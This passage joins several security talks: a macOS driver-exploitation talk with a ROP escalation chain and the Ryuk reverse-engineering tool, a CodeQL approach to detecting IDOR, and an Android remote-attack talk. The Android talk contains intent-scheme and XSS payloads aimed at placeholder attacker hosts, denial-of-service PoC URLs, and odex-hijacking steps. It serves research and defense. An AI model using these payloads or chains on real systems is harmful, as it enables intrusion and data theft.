to be overriden by the driver
Auto Gen Con/Destructors
Class name of the driver
Drivers in Kernel
• In order to provide service to programs in userspace, drivers need
to implement userclients
• Userclient: Kernel objects to provide service to programs in
userspace
• Create in two ways:
Info.plist
Callback Method of Driver
Drivers in Kernel
• A sample UserClient
Unique callbacks of UserClient
Alibaba Security
Drivers in Kernel
• IOUserClient provides services through several callback methods:
• externalMethod: Provide methods that can be called in userspace
• clientMemoryForType: Share memory with programs in userspace
• registerNotificationPort: When userspace register to receive notification
• clientClose: When userspace program close connection with the
userclient
• clientDied: When program in userspace connected to the userclient is
dead
• getTargetAndMethodForIndex: Similar to externalMethod, but old fashion
• getAsyncTargetAndMethodForIndex: Similar to above, but async
• getTargetAndTrapForIndex: Similar to externalMethod, but seldom used
Drivers in Kernel
• externalMethod: Callback to provide methods to userspace
program
• IOReturn IOUserClient::externalMethod(uint32_t selector,
IOExternalMethodArguments *arguments,
IOExternalMethodDispatch *dispatch,
OSObject *target, void *reference);
• selector: to select method in userclient
• arguments: arguments passed to the selected method
• dispatch: a struct representing the method to be called
• target: the target userclient for the method to be called on
• reference: reference to send results back to userspace program
Userland Perspective
• Apple provides IOKit.framework for programs in user space to
interact with kernel drivers
• Though public, explicit invocation in iOS will be rejected by App Store
• Important APIs in IOKit.framework:
• IOServiceGetMatchingService, IOServiceGetMatchingServices
• IOServiceOpen, IOServiceClose
• IOConnectCall…Method, IOConnectCallAsync…Method
• IORegistryEntryCreateCFProperty, IORegistryEntrySetCFProperty
• IOConnectMapMemory, IOConnectUnmapMemory
• IOConnectSetNotificationPort
Userland Perspective
• The calling sequence to interact with a driver
IOServiceGetMatchingService → Get the service of the target driver
IORegistryEntryCreateCFProperty → Get the driver's property
IORegistryEntrySetCFProperty → Set the driver's property
IOServiceOpen → Connect to the target driver
IOConnectCall…Method → Call the driver's method through the connection
IOConnectCallAsync…Method → Call method, asynchronously
IOConnectMapMemory → Get a memory region mapped by the driver
IOConnectSetNotificationPort → Prepare to receive notifications from the driver
IOServiceClose → Close the connection
Userland Perspective
• Sample code of using service of IOKit driver
Get the service of IOFireWireLocalNode
Set property hello’s value as hello
Connect to the target service, open IOFireWireUserClient
Call the driver’s method, through the connection
Close connection with the target driver
Userland Perspective
• APIs in IOKit.framework are wrappers of Mach Traps (kinda syscall) ,
which are generated by Mach Interface Generator (MIG) and
eventually call into callback methods implemented by userclients
API
Mach trap
MIG generated
implementation
Real Implementation
of Mach trap in kernel
Callback methods
of userclients
IOConnectCallMethod
io_connect_method
_Xio_connect_method
is_io_connect_method
IOUserClient::externalMethod
Userspace
Kernel
Userland Perspective
• Despite of strict sandbox restriction, some userclients in IOKit
drivers can still be accessed by sandboxed apps on iOS.
• Through experiments, we confirm these available userclients and
their correponding IOKit device driver names on iOS 11
• IOHIDLibUserClient: AppleSPUHIDDevice, AppleCSHTDCodecMikey
• IOMobileFramebufferUserClient: AppleCLCD
• IOSurfaceAcceleratorClient: AppleM2ScalerCSCDriver
• AppleJPEGDriverUserClient: AppleJPEGDrive
• IOAccelDevice2, IOAccelSharedUserClient2, IOAccelCommandQueue2:
AGXAccelerator
• AppleKeyStoreUserClient: AppleKeyStore
• IOSurfaceSendRight, IOSurfaceRootUserClient: IOSurfaceRoot
New Vulns in Drivers on macOS – Current Secure Status
• Though within kernel, drivers are always blamed for poor quality,
which make them frequently be used to exploit the kernel
• Vulns in drivers used in JailBreaks:
• 11 (v0rtex | electra): IOSurfaceRoot (CVE-2017-13861)
• 9 (pangu): IOMobileFrameBuffer (CVE-2016-4654)
• 8 (TaiG): IOHIDFamily (CVE-2015-5774)
• 7 (pangu): AppleKeyStore (CVE-2014-4407)
• With the help of Ryuk, we found and confirmed some new vulns on
macOS
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
Kernel slide = 0x4ebc0b6-0x8bc0b6 = 0x4600000
Though outChannelHandle is only 32bit, but enough since
the high 32bit is always 0xffffff80 here
• CVE-2018-4135: UAF in
IOFirewireFamily driver –
To control PC
• There is no locking or
serialization when
releasing and using a
member variable
• fMem is a member of class
IOFWUserReadCommand
New Vulns in Drivers on macOS – New Vuln 2
• CVE-2018-4135: UAF in
IOFirewireFamily driver –
To control PC
• Exploit: race two threads
to call this function on the
same userclient
New Vulns in Drivers on macOS – New Vuln 2
• CVE-2018-4135: UAF in
IOFirewireFamily driver –
To control PC
• Exploit: race two threads
to call this function on the
same userclient
New Vulns in Drivers on macOS – New Vuln 2
New Vulns in Drivers on macOS – New EXP strategies: Heap Spray
• A new heap spray strategy utilizing OSUnserializeXML on macOS
• io_registry_entry_set_properties: set properties of device, eventually call
is_io_registry_entry_set_properties in kernel
• Some drivers keep any properties set by userspace, e.g., IOHIDEventService
• Pros: the sprayed data can be read; the head of sprayed data is controllable
New Vulns in Drivers on macOS – New EXP strategies: ROP
• After controlling PC, we can gain privilege through ROP chain
• ROP chain (most employed from tpwn)
Stack Pivot
_current_proc
_proc_ucred
_posix_cred_get
_bzero
_thread_exception_return
Get ptr to
struct proc of
current process
Get ucred from
struct proc, i.e.,
process
owner's
identity
Get ptr to struct
cr_posix
Exit kernel, return to
userspace
New Vulns in Drivers on macOS – New EXP strategies: ROP
• After controlling PC, we can gain privilege through ROP chain
• Key step: Stack Pivot
In tpwn (on 10.10)
In rootsh (on 10.11)
New
New Vulns in Drivers on macOS – New EXP strategies: ROP
• After controlling PC, we can gain privilege through ROP chain
• Key step: Stack Pivot
New
Addr of Gadget P2
New Stack: RAX+0x50
RAX
Addr of Gadget “NOP; RET;”
_current_proc, MOV RDI, RAX
RAX (Controlled or Known)
RAX+0x30
Gadget
P1
Gadget
P2
_proc_ucred, MOV RDI, RAX
_posix_cred_get, MOV RDI, RAX
_bzero
_thread_exception_return
RAX+0x40: New Stack Start
RAX+0x38
RAX+0x8
New Vulns in Drivers on macOS – Whole EXP Process
high space of heap
possessed by heap spray
Heap Spray
Trigger Vuln
Jmp to Gadget P1
Run ROP chain
Control PC
Addr of Gadget P2
New Stack: RAX+0x50
RAX
Addr of Gadget “NOP; RET;”
_current_proc, MOV RDI, RAX
_proc_ucred, MOV RDI, RAX
_posix_cred_get, MOV RDI, RAX
_bzero
_thread_exception_return
Privilege Escalation
New Vulns in Drivers on macOS – Privilege Escalation on 10.13.2
• Privilege escalation on the macOS
On macOS 10.13
On macOS 10.13.2
Bugs fixed on macOS 10.13.4
New Vulns in Drivers – Privilege Escalation on macOS 10.13.3
Analyze Apple Drivers: Obstacles
• But! Analyzing macOS and iOS kernel drivers is not easy!
• Closed-source
• Programmed in C++
• Lack of Symbols (mainly for iOS)
• Let’s first look at how drivers’ binary code looks like in IDA pro
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Many
symbols
are kept
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Event better, we
have symbols of
vtables and know
where they are
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Even sMethods of
userclients have
symbols
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Functions have
meaningful names
(for both internal
and external).
These names can
be demangled to
know the
argument types
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Decompiled code is
partially human-
readable
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable, but not suitable for manual review and static analysis
Types of object
variables are
unknown
Classes’ vtable
function pointers are
used everywhere, IDA
pro cannot recognize.
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable, but not suitable for manual review and static analysis
No structures for
classes
Class sizes are
unknown
Member variables
cannot be recognized
by IDA pro
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing useful there! Unreadable, not to mention further
analysis
Functions do not have symbols
Function names are all
meaningless “sub_”
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
There is no symbol for
vtables
No clue to know where
vtables are
No entry can be found
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
Functions
cannot be
recognized
by IDA pro
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
Function names are meaningless
Vtable function pointers are not
recognized
Variables and arguments do not
have any type information
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
No structures for classes
Class sizes are unknown
Member variables cannot be
recognized by IDA pro
Analyze Apple Drivers: A New Tool
• Ryuk: a new tool to recover symbols and solve object-oriented
features in macOS and iOS drivers
• Ryuk: character in the comics series Death Note, who loves eating apples.
• Implemented as IDA pro python script
Ryuk: Design
• Features of Ryuk:
• Class recognition and construction
• Vtable recognition and construction
• Recover function names
• Resolve variable and argument types
• UI support
• …
Ryuk: Effects
• Class Recognition and Construction
Size
Class Name
Ryuk: Effects
• Vtable recognition and construction
Ryuk: Effects
• Vtable recognition and construction
Ryuk: Effects
• Recover function names
Ryuk: Effects
• Recover function names, resolve variable and argument types,
function pointer and member variable recognition
Ryuk: Effects
• UI support
Ryuk: Effects
• UI support
Ryuk: Effects
• UI support
Ryuk: Implementation
• 1. Class recognition and construction
• Functions in __mod_init_func section register all classes
macOS
iOS
Ryuk: Implementation
• 1. Class recognition and construction
• Functions in __mod_init_func section register all classes
macOS
iOS
Class Name
Class Size
Parent Class Info
*Note: multiple inheritance is excluded in libkern
Registration
Ryuk: Implementation
• 1. Class recognition and construction
• Functions in __mod_init_func section register all classes
macOS
iOS
Class Name
Class Size
Parent Class Info
*Note: multiple inheritance is excluded in libkern
Ryuk: Implementation
• 1. Class recognition and construction: Effect
• Structures representing classes are created
Ryuk: Implementation
• 2. Vtable recognition and construction
• On macOS, vtables have symbols and known addresses, no need to find
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 1: adjust the __const section
• Vtables are in __const section, but IDA pro makes it disappear
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 2: find address of class’s metaclass object
• Functions in __mod_init_func section are parsed again
Address of class's metaclass object
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 3: Get xrefs to metaclass object
• The xref in const section nears the vtable
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 3: Get xrefs to metaclass object
• Data before vtables is in some specific format
Xref to metaclass object
Xref to parent’s metaclass
Vtable start preceeding
by 2 zero
Ryuk: Implementation
• 2. Vtable recognition and construction: Effects
• Create structures representing vtables and set the first member of classes
as an pointer to their vtable
Ryuk: Implementation
• 3. Recover function names (virtual functions on iOS)
• Most classes inherit from basic classes in iokit framework like IOService, OSObject,
etc., which have meaningful function names
• Replace the class name in the overridden virtual functions
Overridden virtual functions
IOSurfaceRoot::
getMetaClass
Ryuk: Implementation
• 3. Recover function names (virtual functions on iOS): Effects
Ryuk: Implementation
• 4. Resolve variable and argument types
• Step 1: Figure out the creation of variables
Allocation
Cast
Allocation
Constructor
Ryuk: Implementation
• 4. Resolve variable and argument types
• Step 2: Variable types are decided
Ryuk: Implementation
• 5. UI support
• Purposes:
• Jump to virtual function’s (or children’s) implementation when double-
click on function pointers
• Keep the name and type consistency between function pointer and their
implementation
• Implementation:
• Register action to double-click events
• Register action to key events
• Register action to name change events
• Register action to type change events
Ryuk: Benefits
• For manual review:
• Function names are meaningful
• Function pointers are recognized
• Member variable are recognized
• Variable types are known
• You can jump to virtual function’s implementation from their pointers
with just a double-click
• For static analysis:
• Variable types are resolved
• Call targets of function pointers are known
• Further CFG can be easily constructed
• Explanation and illustration of 2 new CVEs in macOS drivers
• Illustration of whole exploit chain of privilege escalation on macOS
• Innovative exploitation techniques on latest macOS
• Ryuk: a new tool for assisting the analysis of macOS and iOS drivers
• Most important!
• Ryuk: https://github.com/bxl1989/Ryuk
Conclusions
Thanks
Detecting Privilege-Escalation and Unauthorized-Access Vulnerabilities in Microservices with Static Code Analysis
Author: xsser
Background
Much of today's Internet stack follows Alibaba's lead: company application architectures are built on microservices, and on top of frameworks like Spring Boot a whole development ecosystem has grown up. Over time, microservices have generally evolved into an architecture like the one shown here.
Security, as a property, needs to be woven deeply into this framework. Why talk about microservices? Because a unified framework makes static code analysis feasible. Externally purchased systems that cannot be integrated into the microservice ecosystem give us no source code, so static analysis is naturally impossible for them.
A Hard-to-Solve Security Problem
Under today's increasingly mature SDLC security programs, many vulnerability classes — SQL injection, RCE, and the like — have steadily declined. Enterprise development-security efforts keep improving, and common web vulnerabilities are becoming rarer. But one class remains hard to eliminate, and it is a frequent high-scoring SRC submission: the privilege-escalation (broken access control) vulnerability.
使用静态代码工具的数据流来检测越权漏洞
相比传统的静态代码检查工具,例如 sonar、pmd 等,现代的静态代
码检查工具多了一些比如数据流的能力,通过图结构的数据查询使得
发现安全漏洞成为了新的能力,传统的静态代码扫描工具仅仅是对代
码质量的检测,检查固定格式的代码。
下面我就以 CodeQL 这个现代化的静态代码扫描工具来举例:
首先。我们从业务角度去思考一个越权的特征:
1) 请求包中的 GET 参数或者 POST 参数中带有”*Id”字样
2) 未使用“用户微服务”对 request 的 id 解析
3) 查询敏感数据或更新数据中的 SQL 语句和 id 等进行了拼接
对这样的场景的抽象,我们就不难写出一个 QL。
第 1 条很好理解,在 ql 里有一个来自 remoteFlowSource 的类可以满
足这个需求;
第 2 条“没有使用用户微服务”是什么意思呢?其实就是当一个参数
传递进来并且没有数据流经过用户服务,换句话就是未使用用户服务
团队提供的 request 解析 api 进行解析(一般用户服务会提供一些 api
来解析 request 的登陆态,并返回这个 request 的 id 值),这里既然没
雨用到用户服务的解析,自然就不会拿到 id;
第 3 条是说这个应用有数据库查询功能,比如更新订单、查询订单的
敏感信息,也就是常见的 CURD。在这个查询中,一般会带一个条
件,就是“where id = ?”,这里的 id 就是从用户传递过来的对象中
拿到的,而非“用户服务”解析出来的;
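As a concrete illustration of the three conditions, a vulnerable handler might look like the sketch below. All names (build_query, orderId, get_login_id_with_req) are invented for illustration; the point is only the shape of the pattern the QL query hunts for.

```python
# A hypothetical handler exhibiting the three IDOR conditions above.
def build_query(request_params: dict) -> str:
    # Condition 1: an "*Id" parameter is taken straight from the request.
    order_id = request_params["orderId"]
    # Condition 2: the user service is never consulted, i.e. the id is never
    # replaced by something like get_login_id_with_req(request).
    # Condition 3: the id is concatenated into the SQL statement.
    return "SELECT phone, email FROM orders WHERE id = " + order_id

print(build_query({"orderId": "42"}))
```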
How do we write such a QL query?
First we need the dataflow module;
then we need RemoteFlowSource;
then we describe the flow relation RemoteFlowSource -> user service;
then we describe the relation between RemoteFlowSource and the id inside *query("sql" + id);
finally we combine the steps above with and / or and the property is expressed correctly. I sketched a simple diagram to capture the idea.
Seeing this, doesn't IDOR detection look achievable, and not that hard?
In essence, querying a relational graph database is enough to find the bug: abstract the IDOR, then describe the process in a graph query language.
Detecting unauthorized access with a static analysis tool's data flow
Having seen the IDOR detection above, unauthorized access should be very easy to detect. First abstract the process:
1) The user service is not used, e.g. no @getLoginIdWithReq
2) A *query JDBC call is used
3) The queried SQL contains fields such as email or phone
An interface matching these abstract conditions may return sensitive information without requiring login, leaking data.
So our QL should:
1. use the RemoteFlowSource class;
2. find methods without @getLoginIdWithReq;
3. whose bodies reach DAOs whose SQL templates concatenate email, phone, or other sensitive fields.
How well does it work
In my spare time I successfully implemented IDOR detection for a standard microservice setup (validated against SRC-reported bugs). A friend who discussed the approach with me implemented it too; with a fairly coarse ruleset, 8K random interfaces yielded 150 IDOR findings.
Possible pitfalls
Broken data flow. I usually locate the break by bisection; CodeQL now has better ways to test for this, and people have published their techniques online.
Missing sources and sinks. Nothing to add here — discover and accumulate them yourself.
The usual imprecision of static analysis. Through repeated post-mortems you can accumulate isAdditionalFlowStep definitions to manually bridge the breaks. This demands real fluency in QL: with complex object structures you must describe flows precisely, carry context along, and sometimes juggle multiple flows, which gets messy; you also need to keep the QL lean, because over-complex rules slow queries down.
Drawbacks
Long query times — the usual static-analysis complaint; complex expressions simply cost.
How I think about it
I simply thought about what the IDOR process is and how it differs from other bugs: it comes down to stating the business logic clearly, and then the whole logic graph (a graph structure) can describe the process. IDOR in microservices sits on a unified framework and always goes through the user service, and that is what makes detecting it simple.
I would add that detecting IDOR with IAST works the same way, except IAST needs traffic. Applying the same reasoning, IAST's call stacks (think of them as a single-chain graph) can also support IDOR detection, but IAST is less stable for cross-service detection.
A Close Look at Remote Attack Vulnerabilities in Android Apps
z7sky & 行之 @360VulpeckerTeam
About the speakers
weibo: @0xr0ot
@z7sky
z7sky & 行之
Members of 360VulpeckerTeam
Research focus: Android system security and third-party app security
Overview
Mobile Pwn2Own 2013
At Mobile Pwn2Own 2013, security researcher Pinkie Pie chained two Chrome 0-days into remote code execution, taking control of the system from a remote web page.
In 2014, Japanese researcher Takeshi Terada published how the intent-scheme vulnerability in that Pwn2Own exploit was used.
The remote attack entry point with the widest impact
The intent scheme and third-party schemes
Scheme vulnerabilities
Intent scheme vulnerabilities
In Chrome v18 and earlier, a web page could launch a local application by setting a custom scheme as an iframe's src attribute; other Android browsers support this too. From Chrome v25 onward this changed slightly: it is instead done with a custom scheme or with "intent:".
Intent Scheme URLs
A browser that supports intent scheme URLs generally handles them in three steps:
1. Parse the URL with Intent.parseUri(uri) to build an intent object.
2. Filter the intent object; filtering rules differ between browsers.
3. Launch the activity by passing the filtered intent to Context#startActivityIfNeeded() or Context#startActivity().
Syntax example:
intent:mydata#Intent;action=com.me.om;S.url=file:///mnt/sdcard/Download/xss.html;SEL;component=com.ex.uritest/com.ex.uritest.MainActivity;end
Here "S.url=..." is extra data, the part introduced by SEL is the selector intent, and "component=..." names the activity the selector intent is set for.
A fallback page can also be set: when the intent cannot be parsed or no external application can be launched, the user is redirected to the specified page:
S.browser_fallback_url=[encoded_full_url]
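To make the syntax concrete, here is a toy decomposition of the "#Intent;…;end" block into fields. This is not Android's real Intent.parseUri() logic — just an illustration of the structure shown above.

```python
# Toy parser for the "#Intent;...;end" block of an intent scheme URL.
def parse_intent_url(url: str) -> dict:
    body = url.split("#Intent;", 1)[1].rsplit(";end", 1)[0]
    fields = {}
    for part in body.split(";"):
        if not part:
            continue
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key] = value   # e.g. action=..., S.url=..., component=...
        else:
            fields[part] = True   # bare flags such as SEL
    return fields

fields = parse_intent_url(
    "intent:mydata#Intent;action=com.me.om;"
    "S.url=file:///mnt/sdcard/Download/xss.html;SEL;"
    "component=com.ex.uritest/com.ex.uritest.MainActivity;end")
print(fields["action"], fields["component"])
```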
The BROWSABLE category
Two concepts before we continue.
1. android.intent.category.BROWSABLE
This attribute is declared in AndroidManifest.xml. If an application component carries this category, it declares that opening the component from a browser is safe and will not harm the app itself. When a component is fragile or carries important business logic, the usual advice is therefore not to use this category.
Selector Intents
2. Selector Intent
Android API level 15 (Android 4.0.3) introduced the selector intent mechanism: a selector intent can be bound to a main intent, and if the main intent has one, the Android framework resolves the selector intent.
intent://appscan#Intent;S.url=file:///mnt/sdcard/Download/xss.html;SEL;component=com.ex.uritest/com.ex.uritest.MainActivity;end
SEL means a selector intent is set for com.ex.uritest.MainActivity, so the Android framework resolves that selector intent even though com.ex.uritest.MainActivity carries no android.intent.category.BROWSABLE category.
The SEL feature can thus bypass some of Chrome's security restrictions.
Chrome's defenses and their bypass
Intent intent = Intent.parseUri(uri);
intent.addCategory("android.intent.category.BROWSABLE");
intent.setComponent(null);
context.startActivityIfNeeded(intent, -1);
1. Only activity components whose category is android.intent.category.BROWSABLE may receive the intent.
2. Explicit (component) calls are forbidden.
The latest Chrome versions have since added filtering rules for the selector intent as well.
Attack scenarios
With this vulnerability, the browser can be used to attack other applications as well as its own unexported components.
Cookie theft & UXSS
Case: attacking the app's own components
com.xiaomi.shop.activity.MainActivity can be invoked externally to load an arbitrary web page.
Case: attacking a third-party application
intent:#Intent;component=com.xiaomi.shop/com.xiaomi.shop.activity.MainActivity;S.com.xiaomi.shop.extra_closed_url=http://server/acttack.html;end
1. Xiaomi phone remote code execution vulnerability
http://blogs.360.cn/360mobile/2014/08/25/miui-rce-vul/
Defense:
If the same functionality can be achieved another way, avoid addJavascriptInterface(); exploitation can also be blunted by removing system interfaces and loading JS dynamically.
About the WebView RCE, see
http://security.360.cn/Index/news/id/59.html
Browsers on the market still affected

Browser           action  data  extra  component                           BROWSABLE     sel
Sogou Browser     yes     yes   yes    no                                  required      yes
Liebao Browser    yes     yes   yes    no                                  required      yes
Maxthon Cloud     yes     yes   yes    yes (explicit activity calls too)   not required  yes
2345 Browser      yes     yes   yes    no                                  required      yes
Opera             yes     yes   yes    yes                                 not required  yes
Dolphin Browser   yes     yes   yes    yes                                 not required  yes
Mercury           yes     yes   yes    yes                                 not required  yes
Attack case (video)
intent:#Intent;S.url=http://server/attack.html;SEL;component=com.sohu.inputmethod.sogou/com.sogou.androidtool.WebPushActivity;end
On Android below 4.2, Sogou Input Method can be affected by the WebView remote code execution vulnerability, and Liebao Browser's protection can be bypassed via SEL. Using Liebao Browser as a springboard into Sogou Input Method, the RCE bug then takes over the phone.
2. Attacking Sogou Input Method through Liebao Browser
Automated detection and exploitation
Use Androguard to search for the key functions parseUri(), loadUrl(), addJavascriptInterface(). loadUrl may load an unsafe intent scheme URL; the app may additionally carry the WebView remote code execution vulnerability, and combining the two enables a far more damaging attack. Hooking and similar techniques can make detection and exploitation automated and dynamic.
Monitoring intents via hooks
By hooking and monitoring intents we can observe which intent data gets sent out, which helps the research.
Mitigation
From the analysis above, a comparatively safe intent-filtering scheme looks like this:
// convert intent scheme URL to intent object
Intent intent = Intent.parseUri(uri);
// forbid launching activities without BROWSABLE category
intent.addCategory("android.intent.category.BROWSABLE");
intent.setComponent(null); // forbid explicit call
intent.setSelector(null); // forbid intent with selector intent
context.startActivityIfNeeded(intent, -1); // start the activity by the intent
Security is, after all, a continuous game of attack and defense.
Third-party scheme vulnerabilities
Case 1: Tencent Myapp (应用宝)
tmast://download?downl_biz_id=qb&down_ticket=11&downl_url=https%3A%2f%2fwww.mwrinfosecurity.com%2fsystem%2fassets%2f934%2foriginal%2fdrozer-agent-2.3.4.apk
Myapp registers an APK-install function on the tmast scheme without any safety check, so an arbitrary APK can be downloaded and installed — and thanks to the instant-install feature, installed silently and remotely.
<a href="tmast://webview?url=http://m.tv.sohu.com/hots/128?vid=2xss%22};document.getElementsByTagName('head')[0].appendChild(document.createElement('script')).src='//hacker/1.js?xx';test={x:%22:">TEST2<br>
At the time there was an XSS on a trusted domain: among the many trusted domains was a Sohu domain that Tencent does not control, which let the scheme load the attacker's JS.
Myapp also registers a jsb scheme; for its capabilities see:
http://qzs.qq.com/open/mobile/yyb_gift_center/open_yyb_gift_test.html
Looking at the page source, the framework wrapped in the JS is implemented over the jsb:// scheme.
Case 2: Samsung KNOX remote install vulnerability
Samsung MDM's update check is triggered through its registered smdm scheme:
smdm://meow?update_url=http://youserver
The MDM client takes the update_url, appends /latest, and issues a HEAD request; the server returns ETag, Content-Length and x-amz-meta-apk-version, among others. The client checks these three headers and compares x-amz-meta-apk-version against the current MDM package version. If the remote version is greater, v0 is set to 1, meaning an update is needed; the phone then prompts the user about the new update, and on confirmation a GET request fetches the APK update address, which is externally controllable.
When installing the download, the MDM client calls _installApplication(), whose job is to disable package verification (preventing Google from scanning the APK), re-enabling it after installation completes.
Analyzing the whole client flow shows that the post-download install is neither verified nor does it show the requested permissions to the user.
To launch the malicious app afterwards, one can likewise register a third-party scheme for it and wake it from a web page.
Case 3: Sina Weibo
The latest version, v5.3.0, of Sina Weibo registers the third-party scheme sinaweibo://, but several endpoints mishandle it, allowing remote denial of service.
PoC:
<script>location.href="XXX";</script>
XXX =
sinaweibo://browser/close or
sinaweibo://compose?pack=com.yixia.videoeditor or
sinaweibo://addgroupmember?containerid=102603
sinaweibo://browser/?url=http://www.vul.com/uxss.html
XSS (UXSS), CSRF and similar attacks can additionally abuse the login state to perform privileged operations.
A hidden app backdoor in the system: wide-open service ports
Open-port vulnerabilities
A port bound to 0.0.0.0 is reachable from any IP; a port bound to 127.0.0.1 is still reachable by other applications on the same device.
Android apps may use sockets (TCP, UDP, UNIX) to communicate between apps or between their own components — but this channel provides no authentication at all.
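The binding point can be shown in a few lines: below, a hypothetical "service" binds to loopback and a second socket, standing in for any other app on the device, connects with no identity check whatsoever.

```python
# Even a 127.0.0.1-bound socket is open, unauthenticated, to every local process.
import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))      # loopback-only; port chosen by the OS
srv.listen(1)
port = srv.getsockname()[1]

cli = socket.create_connection(("127.0.0.1", port))  # "another app" connects
conn, _ = srv.accept()
cli.sendall(b"hello")
print(conn.recv(5))             # the server accepted us without any auth
conn.close(); cli.close(); srv.close()
```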
Sina Weibo implements an http server in native code (libweibohttp.so), bound to 127.0.0.1 and listening on port 9527.
WooYun case: Sina Weibo v5.2.0, reported by 小荷才露尖尖角
The http request parsing logic lives in the classes com.sina.weibo.utils.weibohttpd.a/b/c. There are three main endpoints:
1. http://127.0.0.1:9527/login?callback=xxx
2. http://127.0.0.1:9527/query?appid=com.sina.weibo
3. http://127.0.0.1:9527/si?cmp=com.sina.weibo_
The first returns the user's identity information whenever the user is logged in.
http://127.0.0.1:9527/query?appid=com.tencent.mtt returns QQ Browser's installation info, or "no install" if absent.
http://127.0.0.1:9527/si?cmp=com.sina.weibo_componentname reaches Weibo's unexported components: opening
http://127.0.0.1:9527/si?cmp=com.sina.weibo_com.sina.weibo.exlibs.NewProjectModeActivityPreLoading
launches the unexported "engineering mode" component, which can execute commands within the app's permissions.
Detection and defense
Detection
Open ports can be listed with netstat, though the system netstat and Busybox's -p option are not very convenient. Google Play has an app for this, netstat plus (screenshot omitted).
Defense
The communication should add authentication, or at least give the user an explicit connection prompt.
The principle is simple — read directly from:
/proc/net/tcp
/proc/net/tcp6
/proc/net/udp
/proc/net/udp6
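A sketch of what reading those files amounts to: the local-address column stores the IPv4 address as little-endian hex followed by a hex port. The sample line below is fabricated; 0x2537 is port 9527, the Weibo case above.

```python
# Parse the local-address column of a /proc/net/tcp-style line.
def parse_tcp_line(line: str):
    local = line.split()[1]                  # e.g. "0100007F:2537"
    ip_hex, port_hex = local.split(":")
    # IPv4 is stored little-endian: 0100007F -> 127.0.0.1
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in range(6, -2, -2)]
    return ".".join(octets), int(port_hex, 16)

print(parse_tcp_line("0: 0100007F:2537 00000000:0000 0A"))  # ('127.0.0.1', 9527)
```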
iframe.src = "http://127.0.0.1:9527/si?cmp=com.sohu.inputmethod.sogou_sogou.mobile.explorer.hotwords.HotwordsWebViewActivity&data=http://X.X.X.X:80/go.html";
Using Sina Weibo as a springboard, we enter a Sogou Input Method component for the next stage of the attack.
A universal vulnerability fallen from the sky: the 0-days leaked from HackingTeam
HackingTeam Android browser exploit
Vulnerabilities:
CVE-2011-1202
CVE-2012-2825
CVE-2012-2871
Impact:
the stock browser on Android below 4.3
WebView
remote code execution
many domestic third-party browsers (Android 4.4 – 5.1) with custom engines:
Tencent's X5
UC's U3
Baidu's T5
Vulnerability 1: CVE-2011-1202 (information disclosure)
generate-id() leaks a memory address (since patched).
Vulnerability 2: CVE-2012-2825 (arbitrary read)
A type confusion yields an arbitrary memory read at a malicious address (since patched).
Vulnerability 3: CVE-2012-2871 (arbitrary write)
<xsl:for-each select="namespace::*">
Proof of concept (> Android 4.4): information disclosure, arbitrary memory read, memory write.
Exploitation approach
1. Spray the heap with a large number of specific strings via ArrayBuffer, and use the arbitrary read to locate them in memory.
2. Use the arbitrary write to pin down the ArrayBuffer's start address, yielding read/write within a bounded region.
3. Turn the bounded read/write into fully arbitrary read/write.
4. Build a ROP chain and overwrite a vtable pointer.
X5 engine exploit demo: Sogou Input Method
HOW?
The browser is the attack entry point; Weibo is the springboard that opens Sogou Input Method.
browser --URL scheme--> weibo --server socket, intent with data--> Sogou Input Method --loadUrl--> X5 engine --> RCE
The X5 engine loads the malicious page and executes code.
An unexpected malicious file: the Android "parasite" vulnerability affecting tens of millions of apps
About APK cached code
An Android APK is a zip-format archive; the classes.dex inside is effectively the app's executable. When the app runs, the system optimizes classes.dex into a corresponding odex-format file.
Attack points introduced by plugin mechanisms:
• dynamic loading
• reflective invocation
New attack entries:
• zip-extraction vulnerabilities
• DexClassLoader's cache-validation flaw
ZipEntry.getName does not filter "../"
Exploit: forge the cached odex's modTime and crc checks —
1. modify the dex and generate the odex
2. modify the odex
3. build the zip file
(run through dalvikvm, adapted per device model)
Case 1: AMAP (Gaode Maps) and its SDK
Case 2: input-method dictionary files
Case 3: UC Browser
Protection
Fix the entry-point vulnerabilities that allow hijacking the odex, and verify the odex's integrity:
• zip extraction: filter the "../" traversal sequence
• adb backup: set allowBackup="false"
• do not store the odex on the sdcard
• regenerate the odex every time
• record odex metadata and verify it before loading
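The first defense — filtering "../" — can be sketched as a path check: resolve every zip entry name against the extraction directory and reject anything that escapes it.

```python
# A sketch of the "filter ../" defense for zip extraction.
import os

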